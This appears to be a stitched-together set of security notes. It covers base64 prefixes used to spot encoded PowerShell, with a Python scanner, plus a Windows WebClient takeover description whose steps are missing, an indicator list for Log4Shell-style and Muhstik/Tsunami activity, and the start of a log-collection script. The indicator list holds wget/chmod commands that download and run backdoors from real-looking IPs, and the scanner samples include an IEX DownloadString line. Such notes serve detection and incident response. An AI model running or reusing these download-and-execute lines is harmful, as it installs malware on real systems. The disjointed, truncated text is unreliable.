- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
| JAB | 🗣 Jabber | $. | Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
| TVq | 📺 Television | MZ | MZ header |
| SUVY | 🚙 SUV | IEX | PowerShell Invoke Expression |
| SQBFAF | 🐣 Squab favorite | I.E. | PowerShell Invoke Expression (UTF-16) |
| SQBuAH | 🐣 Squab uahhh | I.n. | PowerShell Invoke string (UTF-16), e.g. Invoke-Mimikatz |
| PAA | 💪 "Pah!" | <. | Often used by Emotet (UTF-16) |
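As an added example (not code from the page or its author), a small Python scanner that applies the prefix table above to process command lines: it pulls out long base64 runs, matches them against the known prefixes, and decodes them as UTF-16LE or ASCII as the table indicates, so an analyst sees the plaintext behind the prefix. The sample command lines are constructed, not real telemetry.

```python
import base64
import re

# Prefix table from the page: base64 prefix -> (what it decodes to, is UTF-16LE?)
PREFIXES = {
    "JAB":    ("$ variable declaration", True),
    "TVq":    ("MZ header (PE file)", False),
    "SUVY":   ("IEX (Invoke-Expression)", False),
    "SQBFAF": ("I.E. (Invoke-Expression)", True),
    "SQBuAH": ("I.n. (Invoke-* cmdlet)", True),
    "PAA":    ("<. (tag start, Emotet style)", True),
}

TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # base64 runs; shorter ones are too noisy

def decode_token(token, utf16):
    """Base64-decode token (restoring dropped padding) and render it as text."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if utf16:
        return raw.decode("utf-16-le", errors="replace")
    return raw[:32].decode("latin-1")   # binary content (e.g. MZ) stays printable

def scan_command_line(cmdline):
    """Return one hit per base64 token that starts with a known prefix."""
    hits = []
    for token in TOKEN_RE.findall(cmdline):
        for prefix, (meaning, utf16) in PREFIXES.items():
            if token.startswith(prefix):
                decoded = decode_token(token, utf16)
                if decoded is not None:
                    hits.append({"prefix": prefix, "meaning": meaning, "decoded": decoded})
                break
    return hits

def b64(data):  # bytes -> base64 text, used only to build the constructed samples
    return base64.b64encode(data).decode("ascii")

# Constructed sample command lines, not real telemetry.
SAMPLES = [
    "powershell.exe -nop -w hidden -e " + b64("$env:TEMP + '\\x.ps1'".encode("utf-16-le")),
    "$s=[Convert]::FromBase64String('" + b64(b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')") + "')",
    "powershell.exe -e " + b64("IEX (Get-Content x.txt)".encode("utf-16-le")),
    "powershell.exe -e " + b64("Invoke-Mimikatz".encode("utf-16-le")),
    "[IO.File]::WriteAllBytes('x.exe',[Convert]::FromBase64String('" + b64(b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00") + "'))",
    "powershell.exe -Command Get-Process",
]
```

Running `scan_command_line` over `SAMPLES` yields a JAB, SUVY, SQBFAF, SQBuAH and TVq hit for the first five lines and nothing for the benign last one.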
Cobalt Strike Servers:
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if the Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
- 45.130.229.168:1389/Exploit.class
- Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
- --> curl http://18.228.7.109/.log/log
- log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
- --> Download of Muhstik/Tsunami Backdoor
- wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
- wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
- wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
```powershell
# Ensure errors don't abort the collection
$ErrorActionPreference = "SilentlyContinue"

# Set variables
$DesktopPath = [Environment]::GetFolderPath("Desktop")

# Core event logs to collect from the host
$basic = "C:\windows\System32\winevt\Logs\Application.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx", "C:\windows\System32\winevt\Logs\System.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx", "C:\windows\System32\winevt\Logs\Security.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx"

# Logs covering remote access (RDP connection manager and WinRM)
$remote_logs = "C:\windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx"
```